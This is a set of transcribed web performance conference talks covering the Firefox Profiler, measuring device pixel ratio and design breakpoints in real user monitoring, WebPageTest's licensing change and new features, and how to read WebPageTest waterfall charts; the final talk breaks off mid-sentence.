many processes you're profiling, how many threads you're profiling so it can depend on like a lot of different things. But yeah you can like the first thing is you can use Web Developer preset and then it can disable the sampling if you if you don't want that. Next question from Toto. How long are the profiles uploaded for and is there a way to delete them for example in case of mistake? 
Normally they're uploaded and then they're there forever but we want to change that policy to like expire in like six months so but there's actually a way to delete that. So let's say that you've uploaded a profile and we place like a cookie or something in your local storage that this is uploaded by you so if you go into that profile again you can delete it by going on the top right corner and you can go into the profile information panel and then there's delete button. You can delete your profile and it will be automatically deleted from our servers or you can go to the home page and in the home page you can actually like see the profiles that are uploaded by you so you can also look at the list there and delete from there.
The Firefox Profiler is a profiler that is built into Firefox. It has tighter integration with Firefox than external profilers. With its special annotations on Firefox's source code, it tells you what's happening at a point in time on your JavaScript code. With various measurements, it can provide more information and insight into your web application. During the talk, I will be briefly explaining the profilers, how to capture a good profile and how to analyze the profile data. I will be sharing Firefox Profiler specific features and how to make the best use of them. In the end of the slides, I will be doing a demo on how to analyze a performance problem. A profiler is a tool that monitors the execution of an application and gathers the data about the program execution in that time frame. Using a profiling tool to look at problems can make it a lot easier to figure out what’s going on in the application. It helps you to get detailed information about the execution of your application and it allows you to understand the behavior of it. At Mozilla, we are working hard to make the Firefox Profiler better for web developers. In Firefox, we are replacing the old performance panel inside the Developer Tools with Firefox Profiler so people can fully utilize all the new features that come with Firefox Profiler. We are both happy and excited to share more about this tool!
10.5446/52828 (DOI)
Hi, thank you for joining. This session is all about responsive run. This is a very simple technique all of you can apply to get more value out of your run data. My name is Tim and I'm a web performance architect at Akamai and I also run the largest scale modeling website in the world and on a day-to-day basis I'm in touch with real user monitoring and I really like run or real user monitoring. Why? Because it gives me very valuable insights in the performance of my website under real-world conditions. No matter if my visitors are using their cell phone on the train or if they're sitting at home in the sofa using a tablet, I can see how my website behaves under these conditions. So that's great. So I love run. Now my love is not endless and the main reason why it's not endless is it is not responsive. Real user monitoring, all the tools, open source or commercial are very modern and still they don't support responsive design. They support core web vitals. They support single-page apps or some of them can even measure service worker startup time. So all modern techniques, still responsive design, which is not new, is not supported. The closest we can get is this very simplistic classification, desktop mobile tablet. You see this everywhere. Now from my perspective in order to measure, to analyze performance, this is too simplistic. It might have worked 10 years ago when devices looked like this. Today, where large phones can be bigger than small tablets or where large tablets can be bigger than small desktops and where some people have big screens like this, this very simplistic classification no longer works. So in order to get most of your run data, we need in a responsive world, responsive run. And there are two things I will share with you how you can get there and it's actually quite easy. But before we get there, we need to fix a first bias, bias, the device type bias. What do I mean with that? If you're looking at your data, you see every tool has this classification. So 48% of my users are mobile. Now when I zoom in on mobile, in my mind, I make this automated connection that mobile corresponds to cellular. And when I zoom in on desktop, it corresponds to broadband. Now we all know that this is not true. Still in day to day discussions, in day to day blog posts, when we talk about mobile, hey, how is your mobile performance? You will answer in a talk about a phone on a cellular connection. Oh, my mobile performance is much, much slower than desktop. Desktop meaning desktop in combination with broadband. And this is everywhere. Google page speed insights, awesome tool, love it. Here we have two classifications, mobile and desktop. Mobile, if you read the documentation, it's a mid-range phone using a cellular connection. While desktop is a big screen on a fast connection. So it's really everywhere. Now why is this a problem? It's a problem because it can really ruin your analysis. Let me share two examples. This is the connectivity of mobile devices on my website. Now suppose you look at the medium, largest contentful paint or any other timers. What would you look at in this case? Here you see that almost 70% of the users is using a cable connection. That's somebody sitting at home connected to the Wi-Fi. That's still a broadband connection. Now if you're looking at, if you're just focusing on mobile and you're looking at all the data and you think you have no performance problem, you might be wrong. Why? 
Because you're actually looking at a mobile device on a cable connection at the medium levels. Same for desktop. Many of my customers, they like to look for desktop at the higher percentiles. For example, 90th or 95th percentile. If you do that and you wonder why is my performance on desktop so slow? Look here, 15% is using a cellular connection. What is that? In a world where we could still travel, that's people on the train using their work laptop and connecting to the Wi-Fi of their cellular phone, which remains a cellular connection. Or some of my visitors are really living in the middle of nowhere and the only way to get internet is a cellular modem in their homes. So first thing is before we go into the next steps is make sure that whenever you zoom in on your performance, don't make the mistake to just look at the device type. Take at least into account the device type and the connection. Now, screen quality. The very simplistic classification does not take into account screen quality. And again, 10 years ago, 8 pixel was 8 pixel. In 2021, we have retina screens, some screens on some phones having even 3x or 4x. What does it mean? That the amount of image pixels you can ship in order to have good quality needs to be increased. How do you do that? This is an example from my website, a very simple thumbnail. 10 years ago, that was 160 pixels big. In order to have a good quality on a retina screen, I need to add the source set element. So I specify if you're a retina screen, don't ship the 160 pixels image, ship the 320 pixels image because that's 2x. Now, why does that matter from a performance perspective? You might ask. Here, it's a thumbnail. Who cares? Here is for this thumbnail default, 6 kilobytes, one and a half X is 10 kilobytes and the 2x version is 22 kilobytes. Now, performance difference between 6 and 22, who cares? Now, this is a thumbnail. Suppose you have a search with 50 thumbnails. 6 times 50 is 300 kilobytes. 6 times, sorry, 50 times 22, it's more than 1 megabyte. Will that impact the performance? Does that impact your performance budget? Likely yes. Maybe not on a desktop connection, but on a cellular connection, potentially yes. So how do you get that extra information in RAM? It's very easy. In JavaScript, if you type in window.devicepixelratio in your console, you will get the DPR or device pixel ratio of your screen. So what do I do on my website? I read that variable on every page and I send that to my analytics, both the marketing analytics as well as RAM. And what information do you get? Something like this. So 1x, 2x, 3x, but also more strange values like 2.625. That actually a very popular Samsung phone and many other verres. Like here you even see 4x. Crazy big. Now, if we zoom in on mobile, what do we see? Two things. First, where do you spot 1x? It's not on the screen. And then you see that very strange value 2.549999. You see the craziest DPR values. It also depends on the resolution people set on their screen. So on my screen, I'm looking at now, depending on the resolution, it goes from 2 to 2.2 or a very strange value like 2.14x. So this also brings me to the biggest issue. If you capture the DPR, there's so many different variations. It's a bit complex. So the cardinality, there's so many different variants makes it almost impossible to really analyze. Now, what we need to do here is, is this important information? Yes. But from a website perspective, we can actually simplify this and really make it usable. Let me show you how to do this. 
So by default, I put, I say that my data layer equals 1x. On my website, I know I only have a 1x, a 1.5x and a 2x versions, meaning a screen of 3x, 4x or 3.75, all the special things. If it's bigger than 1.75, the browser will decide to pick the 2x versions. So the browser picks the DPR, which matches closest to the one you provide, meaning a device pixel ratio of 1.4 will pick the 1.5. A device pixel ratio of 1.622222 will pick the 1.5. So all these different variations, here is a slight reminder. If I take into account this formula, I get this. Because in the end, I don't care about the exact device pixel ratio. I care about how many bytes do I ship, which images do I ship? And they're basically just three variants. So my home page has three variants, the 1x version, the 2x version and the 1.5x version. Now, DPR is, if we zoom in on mobile, what do you see? All these variations on the left become this very simple 2x version. So what did I learn from this? That 1x on mobile is dead. Now, that will allow me to do two things on my website. First is all my hero images, the current 360 pixels variants of my hero images. I will remove them. There is no need for them. So that will, I have two million different product images on my website. So that means I can remove two million images times 360 pixels. That's one thing. The other benefit is that the chance that the 1x version is in the cache of my CDN is actually low. Why? There is so few traffic. So I can actually make the trade off. Isn't it faster to serve the 1.5x version from cache? Which is, yes, a little bit bigger versus sending the 1. So those are the analysis you can do. Why? Because you have the data. Now, screen quality is one thing. Another thing we need to look at is screen dimensions. My first idea was, you know what, we have desktop tablet mobile, too simplistic. You know what, let's look at the screen dimensions. And this is a screenshot from Google Data Studio where I look into my Google Analytics and put many other tools to give you this. So very detailed, great. Now, again here, first problem, way too many values to make it easy to consume, to make it easy to do some performance analysis. Another issue with just looking at the physical device with is resizing windows. What if on a large screen, somebody puts two screens next to each other? Are you downloading the big version of your website or maybe the smaller version of the website? Same is when you pick your phone in Portrait Mode or in Zoom Mode, that might be a different version of the website you brought. And purely looking at the physical width doesn't give you the full picture. And then a third thing is Enforce Desktop. People on the phone, they use the mobile version. People on the desktop, they use the desktop version. And then you have all these different tablets and they're sitting somewhere in between. And many of my users, I have a feature where they can enforce the full desktop version and some people prefer the full desktop version, some people prefer the mobile version or something in between. Again, there, if you're just looking at the physical width, I can't detect it. So good thing is the solution is again very, very simple. Let me explain. This is my website. It doesn't matter, don't look at the content, but this is, I have 500,000 of these product pages. And from all these hundreds of different device widths or device screen sizes, from a performance perspective, we can actually simplify this. This is now a screenshot from a very large screen. 
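Before moving on to screen dimensions, here is what the DPR capture described above can look like in code — a minimal sketch assuming the site ships 1x, 1.5x and 2x image variants. The thresholds and the dataLayer push are illustrative (adapt them to your own srcset breakpoints and analytics/RUM setup):

```js
// Bucket the exact devicePixelRatio into the image variants this site
// actually ships, mirroring how the browser picks the closest srcset candidate.
function imageDprBucket() {
  const dpr = window.devicePixelRatio || 1;
  if (dpr > 1.75) return '2x';   // e.g. 2, 2.625, 3, 4 all get the 2x images
  if (dpr > 1.25) return '1.5x'; // e.g. 1.4, 1.62222... get the 1.5x images
  return '1x';
}

// Send it as a custom dimension to marketing analytics and RUM.
// `dataLayer` here is the usual tag-manager array -- adjust for your stack.
window.dataLayer = window.dataLayer || [];
window.dataLayer.push({ imageDpr: imageDprBucket() });
```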
If the screen is a little bit smaller, what happens? You just have the margin which becomes a little bit smaller. Make it a little bit smaller, the same. The content in the middle stays the same. It's still the same image, the same amount of images, the same content, everything. So all these different variations, in the end, I serve the same version. And I give these versions a name. So that's 720 pixels. That's for the main content area and a large sidebar. Same here. That's still the 720 pixels with a large sidebar. So it's the same variant I ship to the end user. It's only at a certain point in time that there is not enough space for the large sidebar. So I have a 720 pixels. That's still the same content with a small sidebar. And what are some differences is I will serve different ads, different sizes, different types of ads. So I want to look at the performance there. If we make the screen a little bit smaller, at a certain point in time the sidebar will go away. If you make the screen a little bit smaller, then the picture element and the world kick in. So I will no longer ship the large 720 pixels image. I will ship a 540 pixels image. And then if you make it even smaller, you'll be at the 360 pixels version. So if you look, if you take into account all these different device types and you flip that into what version of my website, what breakpoint of my website am I actually shipping, then it becomes much, much easier. Let me show you how I did that on my website. So I take into account, I call that the design breakpoint, and it looks at the scroll width. So not the device width, it looks at the scroll width. Next, what do I do? I take that value and I put them into buckets. So every screen larger than 1080, I ship the same version 720 large between 767 and 700s, that's 70, 20 small, et cetera. And at the end, if it's smaller than 500 pixels, it's a 360 no version. Key here is don't exaggerate. Or take the key breakpoints where you actually ship other data. For example, I have a 360 and a 400 breakpoint in my CSS. And the only difference is that I changed a bit the font size. I didn't take that into a, I didn't use that as a design breakpoint. Otherwise, you just have way too many variants. So how does that look? This screenshot from my Ramp tool. And you see that 54% of my users uses the full version. I don't know which screen, large, very large, super large, resized, that's the version. So it allows me to look at what is the performance of my website in this specific version. If we then zoom in on mobile, just out of curiosity, what do we see? 94% uses a 360 pixels no version. But still here, suppose you're looking at the 95th percentile on mobile. Why is that so much slower than the 75th percentile or the medium percentile? What do you see here? In this case, it's likely because you ship 700, you ship the 720 pixels image variants because this is users enabling the desktop motors. So if you don't have those insights, you can be really on the wrong foot with your analysis or even come to the wrong conclusions. What is also tells me is that all the work I did on the 720 no and the 720 large on for mobile does not matter. This is the last screenshot before I want to finish. This shows you ampulse around where I use this in action. So I zoom in on mobile and cellular because I want to look at what interests me. And then I can zoom in on, in this case, you're looking at the deep design breakpoints, but I can do the same for DPR, the earlier thing. 
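A sketch of the design-breakpoint bucketing described above, assuming `document.documentElement.scrollWidth` is the scroll width being read; the threshold values and bucket names are illustrative — use only the major breakpoints that actually change what you ship:

```js
// Map the layout width (scrollWidth, so resized windows and "request desktop
// site" are handled) to the named design breakpoint actually being served.
function designBreakpoint() {
  const width = document.documentElement.scrollWidth;
  if (width > 1080) return '720-large'; // full content width, large sidebar
  if (width > 767)  return '720-small'; // full content width, small sidebar
  if (width > 720)  return '720-no';    // main content only, no sidebar
  if (width > 500)  return '540-no';    // smaller content images
  return '360-no';                      // smallest image variant
}

window.dataLayer = window.dataLayer || [];
window.dataLayer.push({ designBreakpoint: designBreakpoint() });
```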
And I can validate how many bytes do I ship to the 720 pixels version? How many bytes do I ship to the 360 pixels version? Because it will differ. Your performance budget might be perfect for the 360 pixels one, but you might have, you might exceed that on another design breakpoint in combination with DPR. So to conclude, responsive run is an easy way to get much more value out of your data in a responsive world. What do you need to do? You take the device classification, which is available everywhere. You take the connection, which is likely available everywhere. And then on top of that, you add two additional dimensions. One is your image breakpoints, one X2X3X. And the design breakpoints, what versions or variants of the image of the website am I serving to my end users? So with that, I would say thank you for your time. After any questions or feedback, we should still have around three minutes to do that. Thank you.
Categorizing device types by desktop, mobile and tablet no longer works in 2021. It is oversimplified, meaningless and likely breaks your current performance analysis on a modern responsive website. As #perfmatters we need meaningful monitoring that takes into account the modern web: - Screen dimensions - Device pixel ratios - Image and CSS breakpoints - Connections Keeping it both simple and meaningful is however not easy! Learn about the different approaches and how to apply this to your existing RUM monitoring solutions: be it free (Google Analytics), open source (Boomerang) or commercial.
10.5446/52830 (DOI)
Hi everyone, I'm Pat Mienen. I'm here to chat with you about WebPageTest. It's been a fairly eventful year. I want to talk a little bit about the licensing changes, the catch point acquisition, and sort of some of the background on why we picked the license we did, particularly being a FOSS conference I thought it would be interesting for everyone, and also some updates on what we've delivered since then on sort of where we're going and what excites me about it. So really quickly, overview on WebPageTest as a project and sort of as an ecosystem. There's the open source code in GitHub, which is sort of the core of WebPageTest. It has the web server code, the agent code, a bunch of utility scripts for installing, and it's sort of the core. Everything you need to build a WebPageTest is up there on GitHub. Up until recently, it was all under a BSD license, so you could do whatever you want with it, and anyone could do whatever they wanted with it. There's public instance of it, so sort of what you know of WebPageTest is webpagetest.org. It's the public WebPageTest instance that I run historically out of my basement and with partners running test locations globally. There's the HTTP archive, which is probably one of the biggest WebPageTest instances, which is also publicly available and managed by a team of us, runs 14 million URLs monthly, whatever take on their own private instance of a public WebPageTest and collects all the data and makes it available. There's a bunch of internal use private instances that companies around the world run. They just take the code or the available images and run their own WebPageTest either within their firewall or just for doing a lot of testing, usually API testing stuff that you couldn't do with the public instance because it was running on my infrastructure in my basement. You needed to do at scale testing or you need to test behind your firewall. Then there's a few commercial services that are built on top of the WebPageTest code as well. They use WebPageTest for doing all of the underlying testing and then they build their sort of value add on top of the underlying WebPageTest. In addition to the free code that's up on GitHub, there's images that I provide on AWS and GCE that primarily for the agents, there are server instances, images as well. You can scale up and down testers if you would as needed in the clouds in whatever location you want. Those are used both by the public WebPageTest as well as private instances and some of the commercial services were using those as well. Full of last year, give or take, I think towards September, Catchpoint acquired WebPageTest.org, the public instance of WebPageTest that I run. As part of that acquisition, we're sort of figuring out what we're definitely focused on keeping it open and free for everyone to use. If you're running private instances, we want to continue to support that market. We want to try and keep the community as engaged as it has been over the years and add engineering resources to it as well. Part of what we also want to do is build a commercial service around WebPageTest. Somewhat like what you see with a lot of the commercial monitoring, but maybe we can put our own spin on it in a way that is WebPageTest unique. They need to make some of their money back from the acquisition and make it worthwhile, but not at the cost of the community. 
What we've been balancing is trying to figure out how do we walk that line and how do we make it as open as possible and keep the community as engaged as it has been over the years and still have a commercially viable path for Catchpoint. When you're building a commercial monitoring service, if you would, the cost structure behind it, a good chunk of cost comes from the actual infrastructure, right? Running instances on the cloud in data centers, running the server, storage of test results. Like right now, the public instance I think has somewhere around 30 terabytes of test data stored historically. On S3, that gets to be fairly expensive if you're storing it on S3. On top of that, you have the product engineering and support for the value add wrappers that you put around the testing. Then there's the engineering, if you would, the costs around building the agents, supporting the browsers, adding new features, dealing with the Chrome changes that come out every six weeks, supporting the instances and that kind of stuff. Catchpoint in a top to bottom stack has to absorb all of those costs, right? If we make and we continue to make the agent available for free for all of our competitors and we absorb all of the engineering costs for the agent development, all of a sudden we're at a competitive disadvantage even though we're sort of building the technology. If all of our competitors get to use all of our engineering for free and they don't have to invest in that, they can have lower cost basis and undercut us on price, which doesn't seem fair. We wanted to figure out sort of where that line falls. To be clear, somewhere around 95% of the code contributions to the WebH test agent code or the WebH test code in general comes from me. And 4.9% comes from the community and it's awesome to see the engagement. And around.1% of the code comes from other commercial providers. And so that 95 to.1% basis is sort of what we're talking about here. And if it was more of a 50-50, then we'd all be sort of absorbing the costs. But we need to figure out a way to distribute those costs. That's fair without compromising the openness for the community and the ability for everyone to just continue using the code in cases where they're not competing with Catchpoint. And so we looked at a bunch of options. And so the easiest option obviously is do a fork. That's what all of the commercial vendors do and do all of our development in secret. It doesn't feel like a great solution for WebH test in general because that cuts off the community and everything else. And so we want to continue to contribute for the community for everyone running private instances to be able to continue to benefit from that work. And so a private fork didn't seem like a good idea. We did look really hard at all of the OSI approved licenses, trying to keep it as open source as possible. Unfortunately, they're all sort of from the days of licensed software that you distribute, put on floppies, or send around. And so they protect code distribution. They protect if someone redistributes your code as part of their product. But they don't work very well in a SaaS offering. And so if we protect it with like an AGPL license or something like that, there's nothing stopping from someone building a complete SaaS offering and never distributing the code built on the same code. And so it didn't seem like a great solution. We couldn't find any license that protected use rather than distribution. 
Another option — and this is what Mongo and Redis ended up having to do with their service offerings and their code — is to build a custom license. We looked long and hard at that, but if we could avoid it, we wanted to avoid a custom license. We'd like to stay as standard as possible and have as little explaining to do about what's special about our license. And so, with help from lawyers in this space, we came across the Polyform Project, which is a set of licenses that came out of the work Mongo and Redis had to do to protect SaaS offerings. It's what they call a code-available license. It's not technically open source because it's not OSI approved, but it makes all of the code available with various restrictions depending on which of the licenses you pick. We picked the Polyform Shield license, which was the most permissive we could find that would still give us protection against a competitor using our code without contributing to either the code or the costs of development. What that ends up doing is — well, we branched the GitHub code. There's an Apache branch of the code, which the community is more than welcome to continue to contribute to; it continues under the Apache 2 / BSD open license — use it, do whatever you want with it. But the main trunk of the code is now under a Polyform Shield license, which is as permissive as possible: you can use it for anything you want, as long as you're not using it in a way that competes with Catchpoint. So if you're using it for internal use, you can continue running private instances and continue using all of the code that we develop — we're going to try and keep it as open and up to date on GitHub as we develop it. If you're running one of the public instances — the HTTP Archive, for example — we're going to continue to work with them on using the latest and greatest code. If you're running a commercial service, that's where you're going to have to either contribute and work with the community on the Apache branch, or work with us on a commercial license for the Polyform main tree, so that it evens the playing field. That's a lot of the background on why we picked the license that we did. We're trying really hard to keep this as open as possible for the community to continue using the way they have been, and to minimize the disruption to as many people as possible while still keeping it fair for everyone involved. So, off the licensing background and into some of the more exciting features: what's been happening, what have we been working on with WebPageTest since the acquisition. Core Web Vitals are the latest and greatest — they're coming out, they're going to be impacting search results — and we've been trying to figure out how to expose what's going on underneath the Core Web Vitals more to developers. One of those is Largest Contentful Paint. To me this is the most exciting of the Core Web Vital metrics: when has the core content become visible? One of the recent additions is in the filmstrip view of WebPageTest: if you ask it to highlight the Largest Contentful Paint events, the candidate events as the page is loading will get highlighted in blue.
Then the last Largest Contentful Paint — the one that ends up being reported as, okay, this is the largest thing that was loaded in the loading sequence — gets highlighted in green. So you can see what the LCP-triggering event was and do some validation. There have been browser issues where it reports the wrong thing, or the content is visible way before LCP triggers, and this gives you a way to validate that as well. But it also lets you see what it's triggering on, so you can figure out how to optimize getting that piece of content loaded sooner. Next, layout shift debugging. There are a few aspects to this. This is the Core Web Vital that wants to make sure the content on the page doesn't shift around a whole lot after the user loads the page. The first thing we landed was: you can say highlight layout shifts at the bottom of the filmstrip, and it'll draw a red box around the piece of content that moved since the previous frame, so you can visually see what's going on. But what that doesn't tell you is how much the content moved and how much it contributed to the overall CLS. So we also added, below the filmstrip, a number that tells you — on the right — the total cumulative layout shift for the whole page load, and on the left how much this frame contributed to that. So, like in this case, in the first frame it looks like a whole lot of the content moved, but it actually moved very little, so it doesn't contribute to the CLS a whole lot; whereas the last frame, where a video header was put across the whole thing and all of the content moved down, was both a large piece of content and moved a lot, and contributed significantly. That's the main source of the CLS in this page load.
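(An illustrative aside, not from the talk: the same two metrics can be watched directly in the browser with the standard PerformanceObserver API, which is handy for cross-checking what WebPageTest highlights. A minimal sketch:)

// Log LCP candidates as they are reported; the last entry before user input
// is the one that counts as the page's LCP.
new PerformanceObserver((list) => {
  const entries = list.getEntries();
  const latest = entries[entries.length - 1];
  console.log('LCP candidate at', latest.startTime, 'ms:', latest.element);
}).observe({ type: 'largest-contentful-paint', buffered: true });

// Accumulate layout shifts into a running CLS value.
let cls = 0;
new PerformanceObserver((list) => {
  for (const entry of list.getEntries()) {
    // Shifts right after user input are excluded from CLS by design.
    if (!entry.hadRecentInput) cls += entry.value;
  }
  console.log('CLS so far:', cls.toFixed(4));
}).observe({ type: 'layout-shift', buffered: true });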
Then we get into what really excites me: expanding the browser footprint. The Chrome team is awesome — they've got great developer tools, debugging tools and remote management support — so a lot of testing is done with Chrome. Unfortunately, that doesn't cover all of the market. A huge amount of the market is on Safari, and I've been trying to figure out what we can do to get better testing on Safari and make it easier to test on Safari. You can emulate an iPhone in Chrome, but it's a different rendering engine, a different networking stack and prioritization, a different JavaScript engine, a different graphics engine. So while you may be loading content that's targeted at the iPhone user agent string, it doesn't actually behave like Safari would. My first pass at that was adding support for Epiphany on Linux so you can test with WebKit. It gets you close — it gets you the rendering engine and the JavaScript engine from Safari — but it doesn't get you the networking stack, and to me that's kind of a big deal. Much more recently — and it should hopefully be announced by the time this comes out — we added support for the iOS simulator. WebPageTest has had support for iOS device testing, but scaling devices is hard: you need a lot of devices and Raspberry Pis, and the networking setup is complex. We can now run WebPageTest in the iOS simulator, testing every device form factor that's available, using the real Safari engine with the real networking stack and the whole shebang, and we get all of the detail that we get when we normally run Safari on real devices. So we get the full waterfall, and almost every feature that's available in WebPageTest is available with Safari as well. The really exciting piece to me is Apple Silicon. We can now run WebPageTest on M1 Macs using the native binaries. The Chrome Arm build is interesting, but what's really interesting is the iOS simulator on an M1 Mac, because it's running the same CPU that the phones are running. We benchmarked them — Octane 2 on the iOS simulator versus an iPhone 12 returns identical results. So with one Mac mini now, you can test every device form factor, running the real silicon that iPhones run, running Safari. You can do all sorts of really scalable iOS and Safari performance testing now, and I'm really excited to see where we can take that. And that's it. I've got a couple of minutes for questions and I'll hang around. So thank you very much. You can always ping me on Twitter as well at patmeenan.
Patrick will discuss the background behind the WebPageTest license change from Apache to Polyform Shield as well as the new features introduced to WebPageTest since the acquisition by Catchpoint.
10.5446/52831 (DOI)
Hello everyone. First, thank you to the FOSDEM Web Performance Dev Room organisers for allowing me to speak today. I'm Matt Hobbs. I work for the UK Government Digital Service as head of front-end. As well as front-end, I have a keen interest in web performance optimisation. But today I'm not here to talk to you about the wonderful world of UK government services — I'm sure you're all disappointed. I'm here to talk to you about a tool you may or may not have heard of, and that is WebPageTest. This talk is mainly about a very specific part of WebPageTest, and that is the waterfall chart. Now, the chart may look intimidating at first, but once you understand it, the visualisation really unlocks a heap of information for you at a glance, allowing you to quickly debug issues, verify they are fixed, and see exactly how a browser loads the page. There are a couple of bits of assumed knowledge for this talk. First is the WebPageTest URL. For those unsure, it's this. It will bring you to the public instance of WebPageTest, where you can test your site's performance for free. Second is that you have run a test. Don't worry, though — if you haven't run one, I just so happen to have a whole blog post all about it right here. A shameless plug, I know. So first, let's cover a little background info. What is WebPageTest? WebPageTest is a synthetic performance testing tool created by Pat Meenan in 2009 while he was working at AOL. It was originally an IE plugin called Pagetest before evolving into the online version we see today. WebPageTest was recently acquired by Catchpoint in 2020. Pat, along with the rest of the Catchpoint team, will help maintain and grow it in the future. But for the past 12 years, the public instance of WebPageTest, including all the test devices, has been sitting in Pat's basement. This image is from 2014 — I assume his basement may have changed a little in six years. WebPageTest allows you to run web performance tests from any of these locations in the world. You can configure the test agents to test your site using a whole host of browsers with many different connection speeds. The data you get back from the tool is invaluable for spotting and fixing web performance issues. Enough of the history of WebPageTest — let's dive right into the waterfall chart. Here's a basic WebPageTest waterfall chart. This test is from my own blog. The chart is essentially a visualisation of the raw data you get back from various browser APIs. I'll split this image into seven sections and go over each very briefly. Number one, the key. Here we see a series of colours. First, a set of browser and connection events like wait, DNS, connect and SSL. Next, a set of files colour coded by their MIME type. You'll see two colour tones for each; I'll go on to what that means a little bit later. Last, in pink, to the right, is the JavaScript execution time. Each of these colours corresponds to an event or request you will see on the request timeline. Number two, the request list. Here we see the list of assets found on this particular page. They're in the order the requests go out over the network. The HTML in this instance is at request number one at the top, but this is not always the case — redirects and OCSP lookups can sometimes come before the page HTML. Number three, the request timeline. Here we see the waterfall. It's much like what you would see in the network tab in your developer tools. The colour coding we saw earlier in the key applies here. Each asset is on its own separate row.
The timing in seconds is along the top and bottom of the image, though this could also be milliseconds for some tests. There's a whole lot more going on in this image that I will cover soon. Number four, CPU utilisation. Here we see a line graph of how much load the CPU of the test device was under at any point in time during the page load. It ranges from zero to 100% utilisation. It's always a good idea to keep an eye on this chart, especially on low spec devices, to see if the CPU is becoming a bottleneck for performance. Number five, bandwidth in. This graph gives you an idea of the data flowing into the browser at any point in time during the page load. The absolute scale isn't particularly accurate, but it's roughly related to the max bandwidth allowed on the connection. In the example here, the max bandwidth is 1,600 kilobits per second, and this equates to a 3G connection. You may want to use this graph to check that the browser is doing useful work rather than bandwidth being wasted during the load. There's a much more accurate option available, called a tcpdump, and this is located under the advanced settings tab when you configure the test. You should enable this if you want more accurate results that you can examine using tools like Wireshark. Number six, the browser main thread. This image isn't taken from my blog, since that's only a small static site and nowhere near as busy as this; it's actually taken from one of the popular news websites here in the UK. Each of the colours corresponds to a particular task that the browser main thread is doing at any point in time. The y-axis corresponds to the percentage of time that task is taking up. This graph is a great way to spot where the CPU has become a bottleneck and what task is causing it. These colours may look familiar if you've used the performance tab in Chrome DevTools, as they are copied from there. And last, number seven, Page is Interactive. This thin bar gives you an indication of when the browser main thread is blocked. If the main thread is blocked for 100 milliseconds or more, the colour will be red; if not, it will be green. A blocked thread may impact inputs like button presses, but browser scrolling is likely to be unaffected, as this is handled off the main thread. So now, if we pull this all together again, this UI hopefully makes a little more sense. You can think of this graph as a story of how the browser has loaded a page. Chapter one, first connecting to the server. Chapter two, the downloading and parsing of the HTML. Chapter three, requesting the additional assets. Chapter four, pixels rendered to the screen. And the final chapter, where the story ends: the finalised page with all its assets loaded. Let's pull out some specifics for the waterfall you can see here. First, let's focus on request number one. We see a connection to the server, the HTML being downloaded and parsed, and the additional page resources found and queued for later request. Note that the pink line is mixed in with the blue asset colour of the HTML. This is JavaScript execution happening during the HTML download and parsing phase — in other words, the HTML page has two large sections of inline JavaScript in the page source. Next, on request 14, we see an additional TCP connection established. This must be due to the asset requiring a crossorigin anonymous connection, since this domain has already been used to download other assets on requests two to five using the connection established on request number one.
Next, request 18: another TCP connection, and the colour of the asset is blue. This is a request for another HTML page, most likely triggered by some JavaScript execution. Another reason I say it was triggered by JavaScript is because of where the TCP connection starts — it lines up with the inline script execution within the HTML on request number one, so there's a very good chance it was initiated there. Also notice how busy the CPU, bandwidth and main thread graphs are. This page is really working this device in all areas. That's not necessarily a bad thing — that's just a lot of useful work happening. The observant among you may have noticed a set of lines in different colours vertically down the page. These lines are specific events that happen during the page load. In the example on the slide we see start render, in green, at 0.6 seconds — here the first pixels are painted to the screen. DOM interactive, at 1.75 seconds, in orange — the HTML has been parsed and the DOM constructed. Document complete, or the onload event, is fired at 5.5 seconds — so static image content has loaded, but changes triggered by JavaScript execution may not be included. There are other lines that aren't on this chart but can be seen in the key above the waterfall, so look out for those too. And finally, the request details panel. Each horizontal row is an asset request. If you click anywhere on a row, a panel will pop up with a heap of information specifically about the selected request and the response it got back: basic details like protocol and timing, all the way through to request and response headers. If you're looking for all these details in a large JSON blob, then the raw details panel will give you this. Using this panel for each request, you can really dig down into the details. So now we've gone through the basic layout and what it all means, let's look at some more advanced examples and point out some of the other features. Using WebPageTest it's easy to examine the difference between HTTP/1.1 and HTTP/2. It's a good example to focus on as it's really easy to spot the differences. Both tests are from testing gov.uk on desktop Chrome using a 3G connection. First let's look at HTTP/1.1. Notice the multiple TCP connections, and notice how eager the connections are on requests 3 and 4. This is default browser behaviour for HTTP/1.1, where it creates multiple connections early in anticipation of downloading multiple assets. Here there's one DNS lookup, shown in red, which is then reused for the other TCP connections, shown in green. And what are known as download chunks can be seen heavily in requests 5 to 7 and 17 to 18. So what are download chunks? This is where the two colour shades I mentioned earlier start to come in. The lighter colour at the start is the time at which the browser sent the request to the server. The dark chunks are data coming back from the server for this particular request. You may be asking what the yellow wait bars signify. This is the point at which the HTML has been parsed but the request for the asset is yet to be made. You can see this in the waterfall by looking at where the blue HTML ends and the yellow wait bars start. In the case shown here, this wait is because there are no free established TCP connections for it to make the request. Also notice how the bandwidth chart has empty sections missing from it.
In this example we have separate TCP connections fighting for limited bandwidth, but even with multiple TCP connections the bandwidth isn't fully utilised. This is what I meant before by the term useful work. By making sure the network connection is fully utilised during this important loading phase, it should in theory improve performance by maximising the number of bytes received by the browser. Now let's compare the exact same page, browser and connection under HTTP/2. The first thing to mention is how much cleaner the overall waterfall looks. There's now only a single TCP connection, on request number one, used for all asset downloads. There's not as much download chunking, as prioritisation is happening over a single connection. Under the hood, Chrome sets the exclusive flag for the stream dependencies on each resource, so it downloads the assets in order from a long internal list. Here's an interesting observation. We seemingly have a single rogue DNS lookup on request 17, but it has no associated connection or SSL negotiation — the orange and pink colour bars. This is actually HTTP/2 connection coalescing in action. The assets domain and the root domain are different domains, but they are on the same underlying infrastructure, so both share the same IP address and SSL certificate. The browser can therefore use the existing TCP connection and SSL negotiation that was established on request number one, and all assets will download over the same single connection even though they are on separate domains. Note the bandwidth from 1.1 to 3 seconds is maxed out. We don't have the gaps over this time period that we did with HTTP/1.1 — this is useful work being done by the connection. If I quickly flip back and forth between the two, you really get to see the difference between the waterfalls. Here we see that WebPageTest has exposed the internals of how the browser downloads a page under specific conditions. If I were to run the same test through Firefox or IE, this picture would look very different. Briefly going back to the subject of download chunks, there's a very simple way to see the data that powers this chunk visualisation. Clicking on the request you want to examine, you'll see a raw details tab — the tab I mentioned before. This tab gives you all the JSON related to this particular request. Scrolling down in this tab you'll see the chunks array. This array contains multiple objects, and each object contains a timestamp of when the chunk completed (not started) and the number of bytes downloaded in this chunk. WebPageTest works backwards from the completed time: it looks at the number of bytes downloaded and the available bandwidth at the time to calculate the chunk width to be displayed on the visualisation. Next up are errors and status codes. WebPageTest will make it very obvious when it encounters status codes other than 200. Just a brief note on the chart used in this example: it's very easy, with 